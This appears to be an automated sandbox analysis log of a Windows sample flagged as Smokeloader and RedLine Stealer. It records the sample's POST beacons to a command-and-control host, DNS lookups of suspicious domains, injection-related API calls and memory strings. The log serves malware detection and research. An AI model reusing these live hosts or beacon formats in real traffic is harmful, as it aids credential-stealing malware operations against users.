      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dsuiipbvrtqiui.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: unicea.ws
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cottwgkexhqi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: unicea.ws
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tyhclxkbrciiuit.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: unicea.ws
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdwyluiudrfobcvl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: unicea.ws
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://shybhbwsshpkm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: unicea.ws
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejvcjodbems.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: unicea.ws
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oilnmucjwyntrxl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: unicea.ws
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: global trafficDNS traffic detected: DNS query: tech-servers.in.net
      Source: global trafficDNS traffic detected: DNS query: unicea.ws
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phdqgddkvvudcrt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: unicea.ws
      Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1745408529.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1744921630.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1746652711.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1748271457.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000001.00000000.1748271457.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1743200606.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1745872183.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1745872183.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1748271457.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_004032C7 CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,5_2_004032C7
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
